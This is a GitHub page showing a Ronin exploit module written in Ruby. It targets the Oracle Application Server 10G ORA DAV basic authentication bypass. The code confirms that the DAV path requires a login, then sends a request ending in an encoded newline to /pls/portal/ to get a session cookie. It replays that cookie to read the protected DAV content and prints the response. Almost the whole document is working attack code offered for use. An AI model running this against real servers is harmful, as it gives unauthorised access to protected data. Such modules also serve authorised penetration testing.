Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
branch: master
Fetching contributors…

Cannot retrieve contributors at this time

executable file 65 lines (46 sloc) 1.545 kb
#!/usr/bin/env ronin-exploit -f
require 'ronin/exploits/http'
Ronin::Exploits::HTTP.object do
cache do
self.name = 'Oracle Application Server 10G ORA DAV Basic Authentication Bypass Vulnerability'
self.version = '0.1'
self.description = %{
This module sends tests for the Oracle Application Server 10G ORA DAV
Basic Authentication Bypass Vulnerability.
}
licensed_under :mit
author :name => 'CG', :organization => 'carnal0wnage'
end
build do
@dav_path = '/dav_portal/portal/'
@guest_path = '/pls/portal/%0A'
end
deploy do
print_info "Testing for dav_portal authentication required"
unless http_status(:path => @dav_path) == 401
deploy_failed! "Did not receive a HTTP 401 response: #{@dav_path}"
end
print_info "Sending the bypass request ..."
@res = http_get(:path => @guest_path)
unless @res.code == '200'
deploy_failed! "Did not receive a HTTP 200 response: #{@guest_path}"
end
if (@cookie = @res.headers['Set-Cookie'])
print_debug "Received Cookie: %s", @cookie
end
print_info "Replaying the HTTP Request with Cookie ..."
@res = http_get(
:path => @dav_path,
:headers => {
:cookie => @cookie,
:connection => 'keep-alive'
}
)
unless @res.code == '200'
@res.headers.each { |name,value| puts "#{name}: #{value}" }
deploy_failed! "Could not replay HTTP Request for #{@dav_path}"
end
print_info "Response body:"
puts @res.body
end
end
Jump to Line
Something went wrong with that request. Please try again.